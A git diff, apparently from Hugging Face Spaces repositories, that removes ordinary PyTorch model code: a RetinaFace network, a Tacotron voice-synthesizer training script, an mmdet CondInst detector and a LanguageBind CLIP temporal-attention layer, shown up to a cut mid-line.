b/spaces/KenjieDec/GPEN/retinaface/facemodels/net.py deleted file mode 100644 index beb6040b24258f8b96020c1c9fc2610819718017..0000000000000000000000000000000000000000 --- a/spaces/KenjieDec/GPEN/retinaface/facemodels/net.py +++ /dev/null @@ -1,137 +0,0 @@ -import time -import torch -import torch.nn as nn -import torchvision.models._utils as _utils -import torchvision.models as models -import torch.nn.functional as F -from torch.autograd import Variable - -def conv_bn(inp, oup, stride = 1, leaky = 0): - return nn.Sequential( - nn.Conv2d(inp, oup, 3, stride, 1, bias=False), - nn.BatchNorm2d(oup), - nn.LeakyReLU(negative_slope=leaky, inplace=True) - ) - -def conv_bn_no_relu(inp, oup, stride): - return nn.Sequential( - nn.Conv2d(inp, oup, 3, stride, 1, bias=False), - nn.BatchNorm2d(oup), - ) - -def conv_bn1X1(inp, oup, stride, leaky=0): - return nn.Sequential( - nn.Conv2d(inp, oup, 1, stride, padding=0, bias=False), - nn.BatchNorm2d(oup), - nn.LeakyReLU(negative_slope=leaky, inplace=True) - ) - -def conv_dw(inp, oup, stride, leaky=0.1): - return nn.Sequential( - nn.Conv2d(inp, inp, 3, stride, 1, groups=inp, bias=False), - nn.BatchNorm2d(inp), - nn.LeakyReLU(negative_slope= leaky,inplace=True), - - nn.Conv2d(inp, oup, 1, 1, 0, bias=False), - nn.BatchNorm2d(oup), - nn.LeakyReLU(negative_slope= leaky,inplace=True), - ) - -class SSH(nn.Module): - def __init__(self, in_channel, out_channel): - super(SSH, self).__init__() - assert out_channel % 4 == 0 - leaky = 0 - if (out_channel <= 64): - leaky = 0.1 - self.conv3X3 = conv_bn_no_relu(in_channel, out_channel//2, stride=1) - - self.conv5X5_1 = conv_bn(in_channel, out_channel//4, stride=1, leaky = leaky) - self.conv5X5_2 = conv_bn_no_relu(out_channel//4, out_channel//4, stride=1) - - self.conv7X7_2 = conv_bn(out_channel//4, out_channel//4, stride=1, leaky = leaky) - self.conv7x7_3 = conv_bn_no_relu(out_channel//4, out_channel//4, stride=1) - - def forward(self, input): - conv3X3 = self.conv3X3(input) - - conv5X5_1 = self.conv5X5_1(input) - conv5X5 = self.conv5X5_2(conv5X5_1) - - conv7X7_2 = self.conv7X7_2(conv5X5_1) - conv7X7 = self.conv7x7_3(conv7X7_2) - - out = torch.cat([conv3X3, conv5X5, conv7X7], dim=1) - out = F.relu(out) - return out - -class FPN(nn.Module): - def __init__(self,in_channels_list,out_channels): - super(FPN,self).__init__() - leaky = 0 - if (out_channels <= 64): - leaky = 0.1 - self.output1 = conv_bn1X1(in_channels_list[0], out_channels, stride = 1, leaky = leaky) - self.output2 = conv_bn1X1(in_channels_list[1], out_channels, stride = 1, leaky = leaky) - self.output3 = conv_bn1X1(in_channels_list[2], out_channels, stride = 1, leaky = leaky) - - self.merge1 = conv_bn(out_channels, out_channels, leaky = leaky) - self.merge2 = conv_bn(out_channels, out_channels, leaky = leaky) - - def forward(self, input): - # names = list(input.keys()) - input = list(input.values()) - - output1 = self.output1(input[0]) - output2 = self.output2(input[1]) - output3 = self.output3(input[2]) - - up3 = F.interpolate(output3, size=[output2.size(2), output2.size(3)], mode="nearest") - output2 = output2 + up3 - output2 = self.merge2(output2) - - up2 = F.interpolate(output2, size=[output1.size(2), output1.size(3)], mode="nearest") - output1 = output1 + up2 - output1 = self.merge1(output1) - - out = [output1, output2, output3] - return out - - - -class MobileNetV1(nn.Module): - def __init__(self): - super(MobileNetV1, self).__init__() - self.stage1 = nn.Sequential( - conv_bn(3, 8, 2, leaky = 0.1), # 3 - conv_dw(8, 16, 1), # 7 - conv_dw(16, 32, 2), # 11 - 
conv_dw(32, 32, 1), # 19 - conv_dw(32, 64, 2), # 27 - conv_dw(64, 64, 1), # 43 - ) - self.stage2 = nn.Sequential( - conv_dw(64, 128, 2), # 43 + 16 = 59 - conv_dw(128, 128, 1), # 59 + 32 = 91 - conv_dw(128, 128, 1), # 91 + 32 = 123 - conv_dw(128, 128, 1), # 123 + 32 = 155 - conv_dw(128, 128, 1), # 155 + 32 = 187 - conv_dw(128, 128, 1), # 187 + 32 = 219 - ) - self.stage3 = nn.Sequential( - conv_dw(128, 256, 2), # 219 +3 2 = 241 - conv_dw(256, 256, 1), # 241 + 64 = 301 - ) - self.avg = nn.AdaptiveAvgPool2d((1,1)) - self.fc = nn.Linear(256, 1000) - - def forward(self, x): - x = self.stage1(x) - x = self.stage2(x) - x = self.stage3(x) - x = self.avg(x) - # x = self.model(x) - x = x.view(-1, 256) - x = self.fc(x) - return x - diff --git a/spaces/Kevin676/Clone-Your-Voice/synthesizer/train.py b/spaces/Kevin676/Clone-Your-Voice/synthesizer/train.py deleted file mode 100644 index d8cc170c415a6f56703dfee23f89a3c9d06511fa..0000000000000000000000000000000000000000 --- a/spaces/Kevin676/Clone-Your-Voice/synthesizer/train.py +++ /dev/null @@ -1,258 +0,0 @@ -from datetime import datetime -from functools import partial -from pathlib import Path - -import torch -import torch.nn.functional as F -from torch import optim -from torch.utils.data import DataLoader - -from synthesizer import audio -from synthesizer.models.tacotron import Tacotron -from synthesizer.synthesizer_dataset import SynthesizerDataset, collate_synthesizer -from synthesizer.utils import ValueWindow, data_parallel_workaround -from synthesizer.utils.plot import plot_spectrogram -from synthesizer.utils.symbols import symbols -from synthesizer.utils.text import sequence_to_text -from vocoder.display import * - - -def np_now(x: torch.Tensor): return x.detach().cpu().numpy() - - -def time_string(): - return datetime.now().strftime("%Y-%m-%d %H:%M") - - -def train(run_id: str, syn_dir: Path, models_dir: Path, save_every: int, backup_every: int, force_restart: bool, - hparams): - models_dir.mkdir(exist_ok=True) - - model_dir = models_dir.joinpath(run_id) - plot_dir = model_dir.joinpath("plots") - wav_dir = model_dir.joinpath("wavs") - mel_output_dir = model_dir.joinpath("mel-spectrograms") - meta_folder = model_dir.joinpath("metas") - model_dir.mkdir(exist_ok=True) - plot_dir.mkdir(exist_ok=True) - wav_dir.mkdir(exist_ok=True) - mel_output_dir.mkdir(exist_ok=True) - meta_folder.mkdir(exist_ok=True) - - weights_fpath = model_dir / f"synthesizer.pt" - metadata_fpath = syn_dir.joinpath("train.txt") - - print("Checkpoint path: {}".format(weights_fpath)) - print("Loading training data from: {}".format(metadata_fpath)) - print("Using model: Tacotron") - - # Bookkeeping - time_window = ValueWindow(100) - loss_window = ValueWindow(100) - - # From WaveRNN/train_tacotron.py - if torch.cuda.is_available(): - device = torch.device("cuda") - - for session in hparams.tts_schedule: - _, _, _, batch_size = session - if batch_size % torch.cuda.device_count() != 0: - raise ValueError("`batch_size` must be evenly divisible by n_gpus!") - else: - device = torch.device("cpu") - print("Using device:", device) - - # Instantiate Tacotron Model - print("\nInitialising Tacotron Model...\n") - model = Tacotron(embed_dims=hparams.tts_embed_dims, - num_chars=len(symbols), - encoder_dims=hparams.tts_encoder_dims, - decoder_dims=hparams.tts_decoder_dims, - n_mels=hparams.num_mels, - fft_bins=hparams.num_mels, - postnet_dims=hparams.tts_postnet_dims, - encoder_K=hparams.tts_encoder_K, - lstm_dims=hparams.tts_lstm_dims, - postnet_K=hparams.tts_postnet_K, - 
num_highways=hparams.tts_num_highways, - dropout=hparams.tts_dropout, - stop_threshold=hparams.tts_stop_threshold, - speaker_embedding_size=hparams.speaker_embedding_size).to(device) - - # Initialize the optimizer - optimizer = optim.Adam(model.parameters()) - - # Load the weights - if force_restart or not weights_fpath.exists(): - print("\nStarting the training of Tacotron from scratch\n") - model.save(weights_fpath) - - # Embeddings metadata - char_embedding_fpath = meta_folder.joinpath("CharacterEmbeddings.tsv") - with open(char_embedding_fpath, "w", encoding="utf-8") as f: - for symbol in symbols: - if symbol == " ": - symbol = "\\s" # For visual purposes, swap space with \s - - f.write("{}\n".format(symbol)) - - else: - print("\nLoading weights at %s" % weights_fpath) - model.load(weights_fpath, optimizer) - print("Tacotron weights loaded from step %d" % model.step) - - # Initialize the dataset - metadata_fpath = syn_dir.joinpath("train.txt") - mel_dir = syn_dir.joinpath("mels") - embed_dir = syn_dir.joinpath("embeds") - dataset = SynthesizerDataset(metadata_fpath, mel_dir, embed_dir, hparams) - - for i, session in enumerate(hparams.tts_schedule): - current_step = model.get_step() - - r, lr, max_step, batch_size = session - - training_steps = max_step - current_step - - # Do we need to change to the next session? - if current_step >= max_step: - # Are there no further sessions than the current one? - if i == len(hparams.tts_schedule) - 1: - # We have completed training. Save the model and exit - model.save(weights_fpath, optimizer) - break - else: - # There is a following session, go to it - continue - - model.r = r - - # Begin the training - simple_table([(f"Steps with r={r}", str(training_steps // 1000) + "k Steps"), - ("Batch Size", batch_size), - ("Learning Rate", lr), - ("Outputs/Step (r)", model.r)]) - - for p in optimizer.param_groups: - p["lr"] = lr - - collate_fn = partial(collate_synthesizer, r=r, hparams=hparams) - data_loader = DataLoader(dataset, batch_size, shuffle=True, num_workers=2, collate_fn=collate_fn) - - total_iters = len(dataset) - steps_per_epoch = np.ceil(total_iters / batch_size).astype(np.int32) - epochs = np.ceil(training_steps / steps_per_epoch).astype(np.int32) - - for epoch in range(1, epochs+1): - for i, (texts, mels, embeds, idx) in enumerate(data_loader, 1): - start_time = time.time() - - # Generate stop tokens for training - stop = torch.ones(mels.shape[0], mels.shape[2]) - for j, k in enumerate(idx): - stop[j, :int(dataset.metadata[k][4])-1] = 0 - - texts = texts.to(device) - mels = mels.to(device) - embeds = embeds.to(device) - stop = stop.to(device) - - # Forward pass - # Parallelize model onto GPUS using workaround due to python bug - if device.type == "cuda" and torch.cuda.device_count() > 1: - m1_hat, m2_hat, attention, stop_pred = data_parallel_workaround(model, texts, mels, embeds) - else: - m1_hat, m2_hat, attention, stop_pred = model(texts, mels, embeds) - - # Backward pass - m1_loss = F.mse_loss(m1_hat, mels) + F.l1_loss(m1_hat, mels) - m2_loss = F.mse_loss(m2_hat, mels) - stop_loss = F.binary_cross_entropy(stop_pred, stop) - - loss = m1_loss + m2_loss + stop_loss - - optimizer.zero_grad() - loss.backward() - - if hparams.tts_clip_grad_norm is not None: - grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), hparams.tts_clip_grad_norm) - if np.isnan(grad_norm.cpu()): - print("grad_norm was NaN!") - - optimizer.step() - - time_window.append(time.time() - start_time) - loss_window.append(loss.item()) - - step = model.get_step() - k 
= step // 1000 - - msg = f"| Epoch: {epoch}/{epochs} ({i}/{steps_per_epoch}) | Loss: {loss_window.average:#.4} | " \ - f"{1./time_window.average:#.2} steps/s | Step: {k}k | " - stream(msg) - - # Backup or save model as appropriate - if backup_every != 0 and step % backup_every == 0 : - backup_fpath = weights_fpath.parent / f"synthesizer_{k:06d}.pt" - model.save(backup_fpath, optimizer) - - if save_every != 0 and step % save_every == 0 : - # Must save latest optimizer state to ensure that resuming training - # doesn't produce artifacts - model.save(weights_fpath, optimizer) - - # Evaluate model to generate samples - epoch_eval = hparams.tts_eval_interval == -1 and i == steps_per_epoch # If epoch is done - step_eval = hparams.tts_eval_interval > 0 and step % hparams.tts_eval_interval == 0 # Every N steps - if epoch_eval or step_eval: - for sample_idx in range(hparams.tts_eval_num_samples): - # At most, generate samples equal to number in the batch - if sample_idx + 1 <= len(texts): - # Remove padding from mels using frame length in metadata - mel_length = int(dataset.metadata[idx[sample_idx]][4]) - mel_prediction = np_now(m2_hat[sample_idx]).T[:mel_length] - target_spectrogram = np_now(mels[sample_idx]).T[:mel_length] - attention_len = mel_length // model.r - - eval_model(attention=np_now(attention[sample_idx][:, :attention_len]), - mel_prediction=mel_prediction, - target_spectrogram=target_spectrogram, - input_seq=np_now(texts[sample_idx]), - step=step, - plot_dir=plot_dir, - mel_output_dir=mel_output_dir, - wav_dir=wav_dir, - sample_num=sample_idx + 1, - loss=loss, - hparams=hparams) - - # Break out of loop to update training schedule - if step >= max_step: - break - - # Add line break after every epoch - print("") - - -def eval_model(attention, mel_prediction, target_spectrogram, input_seq, step, - plot_dir, mel_output_dir, wav_dir, sample_num, loss, hparams): - # Save some results for evaluation - attention_path = str(plot_dir.joinpath("attention_step_{}_sample_{}".format(step, sample_num))) - save_attention(attention, attention_path) - - # save predicted mel spectrogram to disk (debug) - mel_output_fpath = mel_output_dir.joinpath("mel-prediction-step-{}_sample_{}.npy".format(step, sample_num)) - np.save(str(mel_output_fpath), mel_prediction, allow_pickle=False) - - # save griffin lim inverted wav for debug (mel -> wav) - wav = audio.inv_mel_spectrogram(mel_prediction.T, hparams) - wav_fpath = wav_dir.joinpath("step-{}-wave-from-mel_sample_{}.wav".format(step, sample_num)) - audio.save_wav(wav, str(wav_fpath), sr=hparams.sample_rate) - - # save real and predicted mel-spectrogram plot to disk (control purposes) - spec_fpath = plot_dir.joinpath("step-{}-mel-spectrogram_sample_{}.png".format(step, sample_num)) - title_str = "{}, {}, step={}, loss={:.5f}".format("Tacotron", time_string(), step, loss) - plot_spectrogram(mel_prediction, str(spec_fpath), title=title_str, - target_spectrogram=target_spectrogram, - max_len=target_spectrogram.size // hparams.num_mels) - print("Input at step {}: {}".format(step, sequence_to_text(input_seq))) diff --git a/spaces/KyanChen/RSPrompter/mmdet/models/detectors/condinst.py b/spaces/KyanChen/RSPrompter/mmdet/models/detectors/condinst.py deleted file mode 100644 index ed2dc99eea3faf7b03a3970d46a372d28eb89fe1..0000000000000000000000000000000000000000 --- a/spaces/KyanChen/RSPrompter/mmdet/models/detectors/condinst.py +++ /dev/null @@ -1,28 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. 
-from mmdet.registry import MODELS -from mmdet.utils import ConfigType, OptConfigType, OptMultiConfig -from .single_stage_instance_seg import SingleStageInstanceSegmentor - - -@MODELS.register_module() -class CondInst(SingleStageInstanceSegmentor): - """Implementation of `CondInst `_""" - - def __init__(self, - backbone: ConfigType, - neck: ConfigType, - bbox_head: ConfigType, - mask_head: ConfigType, - train_cfg: OptConfigType = None, - test_cfg: OptConfigType = None, - data_preprocessor: OptConfigType = None, - init_cfg: OptMultiConfig = None) -> None: - super().__init__( - backbone=backbone, - neck=neck, - bbox_head=bbox_head, - mask_head=mask_head, - train_cfg=train_cfg, - test_cfg=test_cfg, - data_preprocessor=data_preprocessor, - init_cfg=init_cfg) diff --git a/spaces/KyanChen/RSPrompter/mmpl/__init__.py b/spaces/KyanChen/RSPrompter/mmpl/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/LanguageBind/LanguageBind/model/process_clip.py b/spaces/LanguageBind/LanguageBind/model/process_clip.py deleted file mode 100644 index a4956a852ccbfc705a322c15f1950cf2dceb86a5..0000000000000000000000000000000000000000 --- a/spaces/LanguageBind/LanguageBind/model/process_clip.py +++ /dev/null @@ -1,639 +0,0 @@ -import logging -import math -from typing import Optional, Tuple -from einops import rearrange -from peft import LoraConfig, get_peft_model -from transformers import CLIPConfig -from transformers.models.clip.modeling_clip import CLIPEncoderLayer as SpatialCLIPEncoderLayer, CLIPAttention, CLIPMLP -import torch -from torch import nn -from torch.nn import functional as F - -from training.distributed import is_master - -aaa = {'NUM_FRAMES': 1, 'PATCH_DROPOUT': 0.0} - -def set_global_value(k, v): - global aaa - aaa[k] = v - -def get_global_value(): - global aaa - return aaa - -# @dataclass -# class CLIPVisionCfg: -# layers: Union[Tuple[int, int, int, int], int] = 12 -# width: int = 768 -# head_width: int = 64 -# mlp_ratio: float = 4.0 -# patch_size: int = 16 -# image_size: Union[Tuple[int, int], int] = 224 -# cast_dtype: str = None -# num_frames: int = 2 -# -# ls_init_value: Optional[float] = None # layer scale initial value -# patch_dropout: float = 0. # what fraction of patches to dropout during training (0 would mean disabled and no patches dropped) - 0.5 to 0.75 recommended in the paper for optimal results -# input_patchnorm: bool = False # whether to use dual patchnorm - would only apply the input layernorm on each patch, as post-layernorm already exist in original clip vit design -# global_average_pool: bool = False # whether to global average pool the last embedding layer, instead of using CLS token (https://arxiv.org/abs/2205.01580) -# attentional_pool: bool = False # whether to use attentional pooler in the last embedding layer -# n_queries: int = 256 # n_queries for attentional pooler -# attn_pooler_heads: int = 8 # n heads for attentional_pooling -# output_tokens: bool = False -# -# timm_model_name: str = None # a valid model name overrides layers, width, patch_size -# timm_model_pretrained: bool = False # use (imagenet) pretrained weights for named model -# timm_pool: str = 'avg' # feature pooling for timm model ('abs_attn', 'rot_attn', 'avg', '') -# timm_proj: str = 'linear' # linear projection for timm model output ('linear', 'mlp', '') -# timm_proj_bias: bool = False # enable bias final projection -# timm_drop: float = 0. 
# head dropout -# timm_drop_path: Optional[float] = None # backbone stochastic depth - -# class Video_VisionTransformer(nn.Module): -# output_tokens: torch.jit.Final[bool] -# -# def __init__( -# self, -# num_frames: int, -# image_size: int, -# patch_size: int, -# width: int, -# layers: int, -# heads: int, -# mlp_ratio: float, -# ls_init_value: float = None, -# global_average_pool: bool = False, -# attentional_pool: bool = False, -# n_queries: int = 256, -# attn_pooler_heads: int = 8, -# output_dim: int = 512, -# patch_dropout: float = 0., -# input_patchnorm: bool = False, -# act_layer: Callable = nn.GELU, -# norm_layer: Callable = LayerNorm, -# output_tokens: bool = False -# ): -# super().__init__() -# self.output_tokens = output_tokens -# image_height, image_width = self.image_size = to_2tuple(image_size) -# patch_height, patch_width = self.patch_size = to_2tuple(patch_size) -# self.grid_size = (image_height // patch_height, image_width // patch_width) -# self.output_dim = output_dim -# -# # whether to layernorm each patch, as done in dual patchnorm paper - https://arxiv.org/abs/2302.01327v1 -# self.input_patchnorm = input_patchnorm -# -# if input_patchnorm: -# patch_input_dim = patch_height * patch_width * 3 -# self.patchnorm_pre_ln = LayerNorm(patch_input_dim) -# self.conv1 = nn.Linear(patch_input_dim, width) -# else: -# self.patchnorm_pre_ln = nn.Identity() -# self.conv1 = nn.Conv2d(in_channels=3, out_channels=width, kernel_size=patch_size, stride=patch_size, -# bias=False) -# -# # class embeddings and positional embeddings -# self.scale = scale = width ** -0.5 -# self.class_embedding = nn.Parameter(scale * torch.randn(width)) -# self.positional_embedding = nn.Parameter(scale * torch.randn(self.grid_size[0] * self.grid_size[1] + 1, width)) -# -# self.temporal_embedding = nn.Parameter(torch.zeros(1, num_frames, width)) -# # setting a patch_dropout of 0. would mean it is disabled and this function would be the identity fn -# self.patch_dropout = PatchDropout(patch_dropout) if patch_dropout > 0. 
else nn.Identity() -# -# self.ln_pre = norm_layer(width) -# self.transformer = Transformer( -# width, -# layers, -# heads, -# mlp_ratio, -# ls_init_value=ls_init_value, -# act_layer=act_layer, -# norm_layer=norm_layer, -# ) -# -# self.global_average_pool = global_average_pool -# if attentional_pool: -# self.attn_pool = AttentionalPooler(output_dim, width, n_head=attn_pooler_heads, n_queries=n_queries) -# self.ln_post = norm_layer(output_dim) -# self.proj = nn.Parameter(scale * torch.randn(output_dim, output_dim)) -# else: -# self.attn_pool = None -# self.ln_post = norm_layer(width) -# self.proj = nn.Parameter(scale * torch.randn(width, output_dim)) -# -# self.init_parameters() -# -# -# def lock(self, unlocked_groups=0, freeze_bn_stats=False): -# for param in self.parameters(): -# param.requires_grad = False -# -# if unlocked_groups != 0: -# groups = [ -# [ -# self.conv1, -# self.positional_embedding, -# self.ln_pre, -# ], -# *zip(self.transformer.resblocks[:-1], [self.class_embedding for i in range(len(self.transformer.resblocks[:-1]))]), -# [ -# self.class_embedding, -# self.transformer.resblocks[-1], -# self.ln_post, -# ], -# [self.proj, self.temporal_embedding] -# ] -# -# def _unlock(x): -# if isinstance(x, Sequence): -# for g in x: -# _unlock(g) -# else: -# if isinstance(x, torch.nn.Parameter): -# x.requires_grad = True -# else: -# for p in x.parameters(): -# p.requires_grad = True -# -# _unlock(groups[-unlocked_groups:]) -# -# def init_parameters(self): -# # FIXME OpenAI CLIP did not define an init for the VisualTransformer -# # TODO experiment if default PyTorch init, below, or alternate init is best. -# -# nn.init.normal_(self.temporal_embedding, std=self.scale) -# # nn.init.normal_(self.class_embedding, std=self.scale) -# # nn.init.normal_(self.positional_embedding, std=self.scale) -# # -# # proj_std = (self.transformer.width ** -0.5) * ((2 * self.transformer.layers) ** -0.5) -# # attn_std = self.transformer.width ** -0.5 -# # fc_std = (2 * self.transformer.width) ** -0.5 -# # for block in self.transformer.resblocks: -# # nn.init.normal_(block.attn.in_proj_weight, std=attn_std) -# # nn.init.normal_(block.attn.out_proj.weight, std=proj_std) -# # nn.init.normal_(block.mlp.c_fc.weight, std=fc_std) -# # nn.init.normal_(block.mlp.c_proj.weight, std=proj_std) -# # -# # if self.text_projection is not None: -# # nn.init.normal_(self.text_projection, std=self.scale) -# # pass -# -# @torch.jit.ignore -# def set_grad_checkpointing(self, enable=True): -# self.transformer.grad_checkpointing = enable -# -# def _global_pool(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: -# if self.global_average_pool: -# return x.mean(dim=1), x -# else: -# return x[:, 0], x[:, 1:] -# -# def forward(self, x: torch.Tensor): -# # print('input img', x.shape) -# B, _, T, _, _ = x.shape -# x = rearrange(x, 'b c t h w -> (b t) c h w') -# # to patches - whether to use dual patchnorm - https://arxiv.org/abs/2302.01327v1 -# if self.input_patchnorm: -# # einops - rearrange(x, 'b c (h p1) (w p2) -> b (h w) (c p1 p2)') -# x = x.reshape(x.shape[0], x.shape[1], self.grid_size[0], self.patch_size[0], self.grid_size[1], -# self.patch_size[1]) -# x = x.permute(0, 2, 4, 1, 3, 5) -# x = x.reshape(x.shape[0], self.grid_size[0] * self.grid_size[1], -1) -# x = self.patchnorm_pre_ln(x) -# x = self.conv1(x) -# else: -# x = self.conv1(x) # shape = [*, width, grid, grid] -# x = x.reshape(x.shape[0], x.shape[1], -1) # shape = [*, width, grid ** 2] -# x = x.permute(0, 2, 1) # shape = [*, grid ** 2, width] -# -# # print('embed 
img', x.shape) -# # class embeddings and positional embeddings -# x = torch.cat( -# [self.class_embedding.to(x.dtype) + torch.zeros(x.shape[0], 1, x.shape[-1], dtype=x.dtype, device=x.device), -# x], dim=1) # shape = [*, grid ** 2 + 1, width] -# x = x + self.positional_embedding.to(x.dtype) -# -# n = x.shape[1] -# x = rearrange(x, '(b t) n d -> (b n) t d', t=T) -# x = x + self.temporal_embedding[:, :T, :] -# x = rearrange(x, '(b n) t d -> (b t) n d', n=n) -# -# # a patch_dropout of 0. would mean it is disabled and this function would do nothing but return what was passed in -# x = self.patch_dropout(x) -# x = self.ln_pre(x) -# -# # print('patch_dropout img', x.shape) -# x = x.permute(1, 0, 2) # NLD -> LND -# # print('permute img', x.shape) -# x = self.transformer(x) -# x = x.permute(1, 0, 2) # LND -> NLD -# -# if self.attn_pool is not None: -# x = self.attn_pool(x) -# x = self.ln_post(x) -# pooled, tokens = self._global_pool(x) -# else: -# pooled, tokens = self._global_pool(x) -# pooled = self.ln_post(pooled) # bt, d -# -# pooled = pooled.reshape(B, T, -1).mean(1) -# if self.proj is not None: -# pooled = pooled @ self.proj -# -# if self.output_tokens: -# return pooled, tokens -# -# return pooled -# -# def _build_vision_tower( -# embed_dim: int, -# vision_cfg: CLIPVisionCfg, -# quick_gelu: bool = False, -# cast_dtype: Optional[torch.dtype] = None -# ): -# if isinstance(vision_cfg, dict): -# vision_cfg = CLIPVisionCfg(**vision_cfg) -# -# # OpenAI models are pretrained w/ QuickGELU but native nn.GELU is both faster and more -# # memory efficient in recent PyTorch releases (>= 1.10). -# # NOTE: timm models always use native GELU regardless of quick_gelu flag. -# act_layer = QuickGELU if quick_gelu else nn.GELU -# -# vision_heads = vision_cfg.width // vision_cfg.head_width -# norm_layer = LayerNormFp32 if cast_dtype in (torch.float16, torch.bfloat16) else LayerNorm -# visual = Video_VisionTransformer( -# num_frames=vision_cfg.num_frames, -# image_size=vision_cfg.image_size, -# patch_size=vision_cfg.patch_size, -# width=vision_cfg.width, -# layers=vision_cfg.layers, -# heads=vision_heads, -# mlp_ratio=vision_cfg.mlp_ratio, -# ls_init_value=vision_cfg.ls_init_value, -# patch_dropout=vision_cfg.patch_dropout, -# input_patchnorm=vision_cfg.input_patchnorm, -# global_average_pool=vision_cfg.global_average_pool, -# attentional_pool=vision_cfg.attentional_pool, -# n_queries=vision_cfg.n_queries, -# attn_pooler_heads=vision_cfg.attn_pooler_heads, -# output_tokens=vision_cfg.output_tokens, -# output_dim=embed_dim, -# act_layer=act_layer, -# norm_layer=norm_layer, -# ) -# -# return visual - - - - -class CLIPEncoderLayer(SpatialCLIPEncoderLayer): - def __init__(self, config: CLIPConfig): - super().__init__(config) - self.temporal_embedding = nn.Parameter(torch.zeros(1, config.num_frames, config.hidden_size)) - nn.init.normal_(self.temporal_embedding, std=config.hidden_size ** -0.5) - - self.embed_dim = config.hidden_size - self.temporal_attn = CLIPAttention(config) - self.temporal_mlp = CLIPMLP(config) - # self.t_attn_gate = nn.Parameter(torch.tensor([-20.])) - # self.t_ffn_gate = nn.Parameter(torch.tensor([-20.])) - self.temporal_layer_norm1 = nn.LayerNorm(self.embed_dim, eps=config.layer_norm_eps) - self.temporal_layer_norm2 = nn.LayerNorm(self.embed_dim, eps=config.layer_norm_eps) - - def forward( - self, - hidden_states: torch.Tensor, - attention_mask: torch.Tensor, - causal_attention_mask: torch.Tensor, - output_attentions: Optional[bool] = False, - ) -> Tuple[torch.FloatTensor]: - """ - Args: - 
hidden_states (`torch.FloatTensor`): input to the layer of shape `(batch, seq_len, embed_dim)` - attention_mask (`torch.FloatTensor`): attention mask of size - `(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values. - `(config.encoder_attention_heads,)`. - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more detail. - """ - - - bt, n, d = hidden_states.shape - t = get_global_value()['NUM_FRAMES'] - - - # time embed - if t != 1: - n = hidden_states.shape[1] - hidden_states = rearrange(hidden_states, '(b t) n d -> (b n) t d', t=t) - hidden_states = hidden_states + self.temporal_embedding[:, :t, :] - hidden_states = rearrange(hidden_states, '(b n) t d -> (b t) n d', n=n) - - # time attn - residual = hidden_states - hidden_states = rearrange(hidden_states, '(b t) n d -> (b n) t d', t=t) - # hidden_states = self.layer_norm1(hidden_states) # share layernorm - hidden_states = self.temporal_layer_norm1(hidden_states) - hidden_states, attn_weights = self.temporal_attn( - hidden_states=hidden_states, - attention_mask=attention_mask, - causal_attention_mask=causal_attention_mask, - output_attentions=output_attentions, - ) - hidden_states = residual + rearrange(hidden_states, '(b n) t d -> (b t) n d', n=n) - - residual = hidden_states - hidden_states = rearrange(hidden_states, '(b t) n d -> (b n) t d', t=t) - # hidden_states = self.layer_norm2(hidden_states) # share layernorm - hidden_states = self.temporal_layer_norm2(hidden_states) - hidden_states = self.temporal_mlp(hidden_states) - hidden_states = residual + rearrange(hidden_states, '(b n) t d -> (b t) n d', n=n) - - # spatial attn - residual = hidden_states - - hidden_states = self.layer_norm1(hidden_states) - hidden_states, attn_weights = self.self_attn( - hidden_states=hidden_states, - attention_mask=attention_mask, - causal_attention_mask=causal_attention_mask, - output_attentions=output_attentions, - ) - hidden_states = residual + hidden_states - - residual = hidden_states - hidden_states = self.layer_norm2(hidden_states) - hidden_states = self.mlp(hidden_states) - hidden_states = residual + hidden_states - - outputs = (hidden_states,) - - if output_attentions: - outputs += (attn_weights,) - - return outputs - - - - -# class ResidualAttentionBlock(SpatialResidualAttentionBlock): -# def __init__(self, -# num_frames: int, -# d_model: int, -# n_head: int, -# mlp_ratio: float = 4.0, -# ls_init_value: float = None, -# act_layer: Callable = nn.GELU, -# norm_layer: Callable = LayerNorm, -# is_cross_attention: bool = False,): -# super().__init__(d_model, n_head, mlp_ratio, ls_init_value, act_layer, norm_layer, is_cross_attention) -# -# self.num_frames = num_frames -# self.time_ln_1 = norm_layer(d_model) -# self.time_attn = nn.MultiheadAttention(d_model, n_head) -# self.time_ls_1 = LayerScale(d_model, ls_init_value) if ls_init_value is not None else nn.Identity() -# -# def time_attention( -# self, -# q_x: torch.Tensor, -# k_x: Optional[torch.Tensor] = None, -# v_x: Optional[torch.Tensor] = None, -# attn_mask: Optional[torch.Tensor] = None, -# ): -# k_x = k_x if k_x is not None else q_x -# v_x = v_x if v_x is not None else q_x -# -# attn_mask = attn_mask.to(q_x.dtype) if attn_mask is not None else None -# return self.time_attn( -# q_x, k_x, v_x, need_weights=True, attn_mask=attn_mask -# )[0] -# -# def forward( -# self, -# q_x: torch.Tensor, -# k_x: Optional[torch.Tensor] = None, -# v_x: 
Optional[torch.Tensor] = None, -# attn_mask: Optional[torch.Tensor] = None, -# ): -# k_x = self.ln_1_kv(k_x) if hasattr(self, "ln_1_kv") and k_x is not None else None -# v_x = self.ln_1_kv(v_x) if hasattr(self, "ln_1_kv") and v_x is not None else None -# -# n, bt, d = q_x.shape -# t = get_global_value()['NUM_FRAMES'] -# -# # time attn -# # print('q_x', q_x.shape) -# xt = rearrange(q_x, 'n (b t) d -> t (b n) d', t=t) -# # print('xt', xt.shape) -# xt = self.time_ls_1(self.time_attention(q_x=self.time_ln_1(xt), k_x=None, v_x=None, attn_mask=None)) -# # print('time_attention xt', xt.shape) -# q_x = q_x + rearrange(xt, 't (b n) d -> n (b t) d', n=n) -# # print('time_attention q_x', xt.shape) -# -# # spatial attn -# x = q_x + self.ls_1(self.attention(q_x=self.ln_1(q_x), k_x=k_x, v_x=v_x, attn_mask=attn_mask)) -# -# x = x + self.ls_2(self.mlp(self.ln_2(x))) -# return x - -def print_trainable_parameters(model, msg=''): - """ - Prints the number of trainable parameters in the model. - """ - trainable_params = 0 - all_param = 0 - for _, param in model.named_parameters(): - all_param += param.numel() - if param.requires_grad: - trainable_params += param.numel() - logging.info(f"{msg} Trainable params: {trainable_params} || all params: {all_param} || " - f"trainable: {100 * trainable_params / all_param:.2f}%") - -def convert_model_to_lora(args, model): - if args.clip_type == 'vl' and args.add_time_attn: - target_modules = ["temporal_attn.k_proj", 